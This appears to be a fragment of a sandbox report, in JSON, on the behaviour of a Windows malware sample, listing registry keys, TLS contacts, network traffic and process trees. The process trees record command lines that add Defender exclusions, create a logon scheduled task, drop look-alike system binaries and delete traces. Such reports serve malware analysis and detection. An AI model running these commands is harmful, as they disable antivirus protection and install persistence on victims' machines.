+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\Desktop\\NameSpace",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\Desktop\\NameSpace\\DelegateFolders",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\KnownFolders",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\MyComputer\\RemovableDrives",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\MyComputer\\RemovableDrives\\DelegateFolders",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\NonEnum",
+    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\Main",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\CA",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\CA\\CRLs",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\CA\\CTLs",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople\\CRLs",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople\\CTLs",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople\\Certificates",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\trust",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\trust\\CRLs",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\trust\\CTLs",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\trust\\Certificates",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Explorer",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Safer\\CodeIdentifiers\\0\\Hashes",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Safer\\CodeIdentifiers\\0\\Paths",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Safer\\CodeIdentifiers\\0\\UrlZones",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Safer\\CodeIdentifiers\\131072\\Hashes",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Safer\\CodeIdentifiers\\131072\\Paths",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Safer\\CodeIdentifiers\\131072\\UrlZones",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Safer\\CodeIdentifiers\\262144\\Hashes",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Safer\\CodeIdentifiers\\262144\\Paths",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Safer\\CodeIdentifiers\\262144\\UrlZones",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Safer\\CodeIdentifiers\\4096\\Hashes",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Safer\\CodeIdentifiers\\4096\\Paths",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Safer\\CodeIdentifiers\\4096\\UrlZones",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Safer\\CodeIdentifiers\\65536\\Hashes",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Safer\\CodeIdentifiers\\65536\\Paths",
+    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Safer\\CodeIdentifiers\\65536\\UrlZones",
+    "HKEY_CURRENT_USER_Classes",
+    "HKEY_CURRENT_USER_Classes\\.exe",
+    "HKEY_CURRENT_USER_Classes\\AllFilesystemObjects",
+    "HKEY_CURRENT_USER_Classes\\AllFilesystemObjects\\BrowseInPlace",
+    "HKEY_CURRENT_USER_Classes\\AllFilesystemObjects\\Clsid",
+    "HKEY_CURRENT_USER_Classes\\AllFilesystemObjects\\DocObject",
+    "HKEY_CURRENT_USER_Classes\\AllFilesystemObjects\\ShellEx\\IconHandler",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{04731B67-D933-450a-90E6-4ACD2E9408FE}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{2F6CE85C-F9EE-43CA-90C7-8A9BD53A2467}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{450D8FBA-AD25-11D0-98A8-0800361B1103}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{5B934B42-522B-4C34-BBFE-37A3EF7B9C90}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{64693913-1C21-4F30-A98F-4E52906D3B56}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{64693913-1c21-4f30-a98f-4e52906d3b56}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{89D83576-6BD1-4c86-9454-BEB04E94C819}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{9343812e-1c37-4a49-a12e-4b2d810d956b}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{98F275B4-4FFF-11E0-89E2-7B86DFD72085}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{A00EE528-EBD9-48B8-944A-8942113D46AC}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{EDC978D6-4D53-4B2F-A265-5805674BE568}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{EDC978D6-4D53-4b2f-A265-5805674BE568}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{F324E4F9-8496-40B2-A1FF-9617C1C9AFFE}\\Instance",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\\Instance",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\\Instance\\InitPropertyBag",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{F8278C54-A712-415B-B593-B77A2BE0DDA9}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{a00ee528-ebd9-48b8-944a-8942113d46ac}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{daf95313-e44d-46af-be1b-cbacea2c3065}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{e345f35f-9397-435c-8f95-4e922c26259e}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\CLSID\\{f8278c54-a712-415b-b593-b77a2be0dda9}\\ShellFolder",
+    "HKEY_CURRENT_USER_Classes\\Directory",
+    "HKEY_CURRENT_USER_Classes\\Directory\\BrowseInPlace",
+    "HKEY_CURRENT_USER_Classes\\Directory\\Clsid",
+    "HKEY_CURRENT_USER_Classes\\Directory\\DocObject",
+    "HKEY_CURRENT_USER_Classes\\Directory\\ShellEx\\IconHandler",
+    "HKEY_CURRENT_USER_Classes\\Drive\\shellex\\FolderExtensions",
+    "HKEY_CURRENT_USER_Classes\\Drive\\shellex\\FolderExtensions\\{fbeb8a05-beee-4442-804e-409d6c4515e9}",
+    "HKEY_CURRENT_USER_Classes\\Folder",
+    "HKEY_CURRENT_USER_Classes\\Folder\\BrowseInPlace",
+    "HKEY_CURRENT_USER_Classes\\Folder\\Clsid",
+    "HKEY_CURRENT_USER_Classes\\Folder\\DocObject",
+    "HKEY_CURRENT_USER_Classes\\Folder\\ShellEx\\IconHandler",
+    "HKEY_CURRENT_USER_Classes\\SystemFileAssociations\\.exe",
+    "HKEY_CURRENT_USER_Classes\\SystemFileAssociations\\.exe\\BrowseInPlace",
+    "HKEY_CURRENT_USER_Classes\\SystemFileAssociations\\.exe\\Clsid",
+    "HKEY_CURRENT_USER_Classes\\SystemFileAssociations\\.exe\\DocObject",
+    "HKEY_CURRENT_USER_Classes\\SystemFileAssociations\\.exe\\ShellEx\\IconHandler",
+    "HKEY_CURRENT_USER_Classes\\exefile",
+    "HKEY_CURRENT_USER_Classes\\exefile\\Application",
+    "HKEY_CURRENT_USER_Classes\\exefile\\BrowseInPlace",
+    "HKEY_CURRENT_USER_Classes\\exefile\\Clsid",
+    "HKEY_CURRENT_USER_Classes\\exefile\\CurVer",
+    "HKEY_CURRENT_USER_Classes\\exefile\\DocObject"
+  ],
+  "tls": [
+    {
+      "ja3": "1074895078955b2db60423ed2bf8ac23",
+      "sni": "bitbucket.org",
+      "version": "TLS 1.2",
+      "thumbprint": "4e6a4c3b8215efdf97385e50efb98642843b89f0",
+      "serial_number": "040c19f4e9ba36e333316834b8908235",
+      "issuer": {
+        "C": "US",
+        "OU": "www.digicert.com",
+        "O": "DigiCert Inc",
+        "CN": "DigiCert SHA2 Extended Validation Server CA"
+      },
+      "ja3s": "77aba8c2fc7af389a21affb0253db465",
+      "subject": {
+        "C": "US",
+        "CN": "bitbucket.org",
+        "L": "San Francisco",
+        "O": "Atlassian, Inc.",
+        "ST": "California",
+        "OU": "Bitbucket"
+      }
+    },
+    {
+      "ja3": "1074895078955b2db60423ed2bf8ac23",
+      "sni": "sanctam.net",
+      "version": "TLS 1.2",
+      "thumbprint": "3ed46d4175a592bae8dab5dfa46e24836d82e345",
+      "serial_number": "039f0bbc187cf440adbc9e9c89954a37d0bf",
+      "issuer": {
+        "C": "US",
+        "CN": "R3"
+      },
+      "ja3s": "0cac51a1efd65f5b6c047f539d24313e",
+      "subject": {
+        "CN": "sanctam.net"
+      }
+    }
+  ],
+  "ip_traffic": [
+    {
+      "transport_layer_protocol": "TCP",
+      "destination_ip": "185.65.135.234",
+      "destination_port": 58899
+    },
+    {
+      "transport_layer_protocol": "TCP",
+      "destination_ip": "13.107.4.50",
+      "destination_port": 80
+    },
+    {
+      "transport_layer_protocol": "TCP",
+      "destination_ip": "104.192.141.1",
+      "destination_port": 443
+    },
+    {
+      "transport_layer_protocol": "TCP",
+      "destination_ip": "51.255.34.118",
+      "destination_port": 14433
+    },
+    {
+      "transport_layer_protocol": "TCP",
+      "destination_ip": "185.65.135.234",
+      "destination_port": 58899
+    },
+    {
+      "transport_layer_protocol": "TCP",
+      "destination_ip": "104.192.141.1",
+      "destination_port": 443
+    },
+    {
+      "transport_layer_protocol": "TCP",
+      "destination_ip": "209.197.3.8",
+      "destination_port": 80
+    }
+  ],
+  "processes_tree": [
+    {
+      "process_id": "1180",
+      "name": "%CONHOST% \"63884270-409785765-1124711401-907951297-11692469461968206932-2068757506-1933156310"
+    },
+    {
+      "process_id": "1136",
+      "name": "%CONHOST% \"-16106042451564202799-1064727954-1124093528-15773684341340790361861259252-869253858"
+    },
+    {
+      "process_id": "2804",
+      "name": "%CONHOST% \"-40542629874978953113508502101955653726-2142237983-15632340143136557-1740783057"
+    },
+    {
+      "process_id": "2204",
+      "name": "%CONHOST% \"-291157030-44689599519763476846006265941132675325-6938727871027061752-846573854"
+    },
+    {
+      "process_id": "2384",
+      "name": "%CONHOST% \"15356416371858698971616655065-173220822-1013455786442835643-1696652431-72816561"
+    },
+    {
+      "process_id": "2088",
+      "name": "%CONHOST% \"-12634762094492256852052013660509700669-6441467901049579719-680129457-131011644"
+    },
+    {
+      "process_id": "2584",
+      "name": "%CONHOST% \"-332040313-94977547718957146-1428574376-696280166283831804-1774593772-1460146805"
+    },
+    {
+      "process_id": "2428",
+      "name": "%CONHOST% \"-2110733797-1198848899-10704337151274322012-2051096861505498860-2032469123-1205974262"
+    },
+    {
+      "process_id": "2432",
+      "name": "explorer.exe \"%windir%\\system32\\services64.exe\""
+    },
+    {
+      "process_id": "324",
+      "name": "%windir%\\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",
+      "children": [
+        {
+          "process_id": "2060",
+          "name": "\"%windir%\\System32\\services64.exe\" ",
+          "children": [
+            {
+              "process_id": "1232",
+              "name": "\"cmd\" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit",
+              "children": [
+                {
+                  "process_id": "2184",
+                  "name": "powershell  -Command Add-MpPreference -ExclusionPath '%HOME%' ",
+                  "children": [
+                    {
+                      "process_id": "2812",
+                      "name": "\"pwsh.exe\" -Command Add-MpPreference -ExclusionPath '%HOME%'"
+                    }
+                  ]
+                },
+                {
+                  "process_id": "1288",
+                  "name": "powershell  -Command Add-MpPreference -ExclusionPath '%APPDATA%' "
+                }
+              ]
+            }
+          ]
+        }
+      ]
+    },
+    {
+      "process_id": "2712",
+      "name": "%SAMPLEPATH%",
+      "children": [
+        {
+          "process_id": "2284",
+          "time_offset": 16,
+          "name": "\"%ComSpec%\" /c %TEMP%\\svchost64.exe \"%SAMPLEPATH%\"",
+          "children": [
+            {
+              "process_id": "2332",
+              "time_offset": 16,
+              "name": "%TEMP%\\svchost64.exe  \"%SAMPLEPATH%\"",
+              "children": [
+                {
+                  "process_id": "2484",
+                  "time_offset": 19,
+                  "name": "\"%windir%\\system32\\services64.exe\" ",
+                  "children": [
+                    {
+                      "process_id": "2572",
+                      "time_offset": 19,
+                      "name": "\"cmd\" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit",
+                      "children": [
+                        {
+                          "process_id": "2844",
+                          "time_offset": 29,
+                          "name": "powershell  -Command Add-MpPreference -ExclusionPath '%TEMP%' ",
+                          "children": [
+                            {
+                              "process_id": "2820",
+                              "time_offset": 29,
+                              "name": "\"pwsh.exe\" -Command Add-MpPreference -ExclusionPath '%TEMP%'"
+                            }
+                          ]
+                        },
+                        {
+                          "process_id": "1836",
+                          "time_offset": 22,
+                          "name": "powershell  -Command Add-MpPreference -ExclusionPath '%APPDATA%' ",
+                          "children": [
+                            {
+                              "process_id": "1028",
+                              "time_offset": 22,
+                              "name": "\"pwsh.exe\" -Command Add-MpPreference -ExclusionPath '%APPDATA%'"
+                            }
+                          ]
+                        },
+                        {
+                          "process_id": "2624",
+                          "time_offset": 19,
+                          "name": "powershell  -Command Add-MpPreference -ExclusionPath '%HOME%' ",
+                          "children": [
+                            {
+                              "process_id": "664",
+                              "name": "\"pwsh.exe\" -Command Add-MpPreference -ExclusionPath '%HOME%'"
+                            }
+                          ]
+                        },
+                        {
+                          "process_id": "2556",
+                          "time_offset": 85,
+                          "name": "powershell  -Command Add-MpPreference -ExclusionPath '%windir%' ",
+                          "children": [
+                            {
+                              "process_id": "1848",
+                              "time_offset": 85,
+                              "name": "\"pwsh.exe\" -Command Add-MpPreference -ExclusionPath '%windir%'"
+                            }
+                          ]
+                        }
+                      ]
+                    },
+                    {
+                      "process_id": "2984",
+                      "name": "\"%ComSpec%\" /c %TEMP%\\svchost64.exe \"%windir%\\system32\\services64.exe\"",
+                      "children": [
+                        {
+                          "process_id": "2964",
+                          "name": "%TEMP%\\svchost64.exe  \"%windir%\\system32\\services64.exe\"",
+                          "children": [
+                            {
+                              "process_id": "2176",
+                              "time_offset": 40,
+                              "name": "\"%ComSpec%\" /c schtasks /create /f /sc onlogon /rl highest /tn \"services64\" /tr '\"%windir%\\system32\\services64.exe\"' & exit",
+                              "children": [
+                                {
+                                  "process_id": "1364",
+                                  "time_offset": 41,
+                                  "name": "schtasks  /create /f /sc onlogon /rl highest /tn \"services64\" /tr '\"%windir%\\system32\\services64.exe\"' "
+                                }
+                              ]
+                            },
+                            {
+                              "process_id": "844",
+                              "name": "\"%windir%\\system32\\Microsoft\\Libs\\sihost64.exe\" ",
+                              "children": [
+                                {
+                                  "process_id": "1328",
+                                  "time_offset": 113,
+                                  "name": "\"%windir%\\system32\\services64.exe\" ",
+                                  "children": [
+                                    {
+                                      "process_id": "2136",
+                                      "name": "\"cmd\" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit",
+                                      "children": [
+                                        {
+                                          "process_id": "2236",
+                                          "time_offset": 114,
+                                          "name": "powershell  -Command Add-MpPreference -ExclusionPath '%HOME%' ",
+                                          "children": [
+                                            {
+                                              "process_id": "2336",
+                                              "time_offset": 115,
+                                              "name": "\"pwsh.exe\" -Command Add-MpPreference -ExclusionPath '%HOME%'"
+                                            }
+                                          ]
+                                        }
+                                      ]
+                                    }
+                                  ]
+                                }
+                              ]
+                            }
+                          ]
+                        }
+                      ]
+                    }
+                  ]
+                },
+                {
+                  "process_id": "2452",
+                  "time_offset": 17,
+                  "name": "\"%ComSpec%\" /c schtasks /create /f /sc onlogon /rl highest /tn \"services64\" /tr '\"%windir%\\system32\\services64.exe\"' & exit"
+                },
+                {
+                  "process_id": "2588",
+                  "time_offset": 19,
+                  "name": "\"%ComSpec%\" /C choice /C Y /N /D Y /T 3 & Del \"%TEMP%\\svchost64.exe\"",
+                  "children": [
+                    {
+                      "process_id": "2664",
+                      "time_offset": 19,
+                      "name": "choice  /C Y /N /D Y /T 3 "
+                    }
+                  ]
+                }
+              ]
+            }
+          ]
+        },
+        {
+          "process_id": "2796",
+          "time_offset": 1,
+          "name": "\"cmd\" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit",
+          "children": [
+            {
+              "process_id": "2188",
+              "time_offset": 11,
+              "name": "powershell  -Command Add-MpPreference -ExclusionPath '%TEMP%' ",
+              "children": [
+                {
+                  "process_id": "2300",
+                  "time_offset": 12,
+                  "name": "\"pwsh.exe\" -Command Add-MpPreference -ExclusionPath '%TEMP%'"
+                }
+              ]
+            },
+            {
+              "process_id": "2816",
+              "time_offset": 1,
+              "name": "powershell  -Command Add-MpPreference -ExclusionPath '%HOME%' "
+            },
+            {
+              "process_id": "2296",
+              "time_offset": 15,
+              "name": "powershell  -Command Add-MpPreference -ExclusionPath '%windir%' ",
+              "children": [
+                {
+                  "process_id": "2144",
+                  "time_offset": 15,
+                  "name": "\"pwsh.exe\" -Command Add-MpPreference -ExclusionPath '%windir%'"
+                }
+              ]
+            }
+          ]
+        }
+      ]
+    },
+    {
+      "process_id": "3308",
+      "name": "%WINDIR%\\explorer.exe",
+      "children": [
+        {
+          "process_id": "3616",
+          "name": "%SAMPLEPATH%\\03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b.exe",
+          "children": [
+            {
+              "process_id": "2624",
+              "name": "C:\\Windows\\System32\\cmd.exe",
+              "children": [
+                {
+                  "process_id": "1992",
+                  "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+                },
+                {
+                  "process_id": "3016",
+                  "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+                },
+                {
+                  "process_id": "2112",
+                  "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+                },
+                {
+                  "process_id": "2464",
+                  "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+                }
+              ]
+            },
+            {
+              "process_id": "836",
+              "name": "C:\\Windows\\System32\\cmd.exe",
+              "children": [
+                {
+                  "process_id": "4076",
+                  "name": "%USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe",
+                  "children": [
+                    {
+                      "process_id": "2044",
+                      "name": "C:\\Windows\\System32\\cmd.exe",
+                      "children": [
+                        {
+                          "process_id": "3552",
+                          "name": "C:\\Windows\\System32\\schtasks.exe"
+                        }
+                      ]
+                    },
+                    {
+                      "process_id": "1812",
+                      "name": "C:\\Windows\\System32\\services64.exe",
+                      "children": [
+                        {
+                          "process_id": "3504",
+                          "name": "C:\\Windows\\System32\\cmd.exe",
+                          "children": [
+                            {
+                              "process_id": "1692",
+                              "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+                            },
+                            {
+                              "process_id": "3752",
+                              "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+                            },
+                            {
+                              "process_id": "2828",
+                              "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+                            },
+                            {
+                              "process_id": "2508",
+                              "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+                            }
+                          ]
+                        },
+                        {
+                          "process_id": "1500",
+                          "name": "C:\\Windows\\System32\\cmd.exe",
+                          "children": [
+                            {
+                              "process_id": "3328",
+                              "name": "%USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe",
+                              "children": [
+                                {
+                                  "process_id": "1368",
+                                  "name": "C:\\Windows\\System32\\cmd.exe",
+                                  "children": [
+                                    {
+                                      "process_id": "3808",
+                                      "name": "C:\\Windows\\System32\\schtasks.exe"
+                                    }
+                                  ]
+                                },
+                                {
+                                  "process_id": "1232",
+                                  "name": "C:\\Windows\\System32\\Microsoft\\Libs\\sihost64.exe"
+                                },
+                                {
+                                  "process_id": "3496",
+                                  "name": "C:\\Windows\\explorer.exe"
+                                },
+                                {
+                                  "process_id": "688",
+                                  "name": "C:\\Windows\\System32\\cmd.exe",
+                                  "children": [
+                                    {
+                                      "process_id": "2108",
+                                      "name": "C:\\Windows\\System32\\choice.exe"
+                                    }
+                                  ]
+                                }
+                              ]
+                            }
+                          ]
+                        }
+                      ]
+                    },
+                    {
+                      "process_id": "3728",
+                      "name": "C:\\Windows\\System32\\cmd.exe",
+                      "children": [
+                        {
+                          "process_id": "3136",
+                          "name": "C:\\Windows\\System32\\choice.exe"
+                        }
+                      ]
+                    }
+                  ]
+                }
+              ]
+            }
+          ]
+        }
+      ]
+    },
+    {
+      "process_id": "2380",
+      "name": "itami.exe",
+      "children": [
+        {
+          "process_id": "1472",
+          "time_offset": 20,
+          "name": "C:\\Windows\\System32\\cmd.exe /c C:\\Users\\<USER>\\AppData\\Local\\Temp\\svchost64.exe C:\\Users\\<USER>\\Downloads\\itami.exe",
+          "children": [
+            {
+              "process_id": "2788",
+              "time_offset": 20,
+              "name": "C:\\Users\\<USER>\\AppData\\Local\\Temp\\svchost64.exe C:\\Users\\<USER>\\Downloads\\itami.exe",
+              "children": [
+                {
+                  "process_id": "2620",
+                  "time_offset": 28,
+                  "name": "C:\\Windows\\System32\\cmd.exe /C choice /C Y /N /D Y /T 3 & Del C:\\Users\\<USER>\\AppData\\Local\\Temp\\svchost64.exe",
+                  "children": [
+                    {
+                      "process_id": "2360",
+                      "time_offset": 32,
+                      "name": "choice /C Y /N /D Y /T 3"
+                    }
+                  ]
+                },
+                {
+                  "process_id": "2892",
+                  "time_offset": 26,
+                  "name": "C:\\Windows\\system32\\services64.exe",
+                  "children": [
+                    {
+                      "process_id": "2184",
+                      "time_offset": 44,
+                      "name": "C:\\Windows\\System32\\cmd.exe /c C:\\Users\\<USER>\\AppData\\Local\\Temp\\svchost64.exe C:\\Windows\\system32\\services64.exe",
+                      "children": [
+                        {
+                          "process_id": "644",
+                          "time_offset": 44,
+                          "name": "C:\\Users\\<USER>\\AppData\\Local\\Temp\\svchost64.exe C:\\Windows\\system32\\services64.exe",
+                          "children": [
+                            {
+                              "process_id": "2116",
+                              "time_offset": 46,
+                              "name": "C:\\Windows\\system32\\Microsoft\\Libs\\sihost64.exe"
+                            },
+                            {
+                              "process_id": "2068",
+                              "time_offset": 45,
+                              "name": "C:\\Windows\\System32\\cmd.exe /c schtasks /create /f /sc onlogon /rl highest /tn services64 /tr \"C:\\\\Windows\\\\system32\\\\services64.exe\" & exit",
+                              "children": [
+                                {
+                                  "process_id": "2964",
+                                  "time_offset": 46,
+                                  "name": "schtasks /create /f /sc onlogon /rl highest /tn services64 /tr \"C:\\\\Windows\\\\system32\\\\services64.exe\""
+                                }
+                              ]
+                            }
